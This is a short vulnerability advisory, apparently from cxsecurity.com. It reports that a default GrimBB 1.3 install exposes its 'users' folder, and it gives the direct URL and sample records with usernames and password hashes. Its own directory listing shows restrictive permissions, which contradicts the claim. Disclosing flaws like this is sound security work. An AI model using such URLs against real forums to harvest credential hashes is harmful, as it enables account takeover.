Grimbb 1.3 Hash Disclosure

2016.11.07
Credit: N_A
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Grimbb V1.3 User and Password Hash Disclosure ============================================== Discovered by N_A, N_A[at]tutanota.com ======================================= Description ============ A PHP 4 Open Source Flat File Based Bulletin Board System -> GrimBB uses text files to store the data for posts (doesn't need outside database like MySQL). Its easy to configure (only two distribution files require changes to achieve immediate results). https://sourceforge.net/projects/grimbb Vulnerability ============== After a *default* installation of Grim Bulletin Board v 1.3 permissions for the 'users' folder is world readable resulting in full disclosure of stored usernames and password hashes root@kali:/var/www/html/grimbb# ls -al ......... ......... drwx------A 2 www-data www-dataA 4096 NovA 5 18:13 users root@kali:/var/www/html/grimbb# Exploitation ============= Go to the following URL: http://127.0.0.1/grimbb/users Files containing usernames and hashes are readble, examples below: type = 3 name = "jimmy" pass = "15dfb4e0bc6ec941b33bbf26f532116b" logdate = "201611" register = "201611051813390" userip = ********* type = 0 name = "admin" pass = "d7e20b780957b7ba1b3b82fd76cf1485" logdate = "201611" register = "201611051634460" userip = ********** type = 3 name = "pentest" pass = "185eb48dec37cdedb5713c104841941d" logdate = "201611" register = "201611051813140" userip = ********** Email ====== N_A[at]tutanota.com -- Securely sent with Tutanota. Claim your encrypted mailbox today! https://tutanota.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top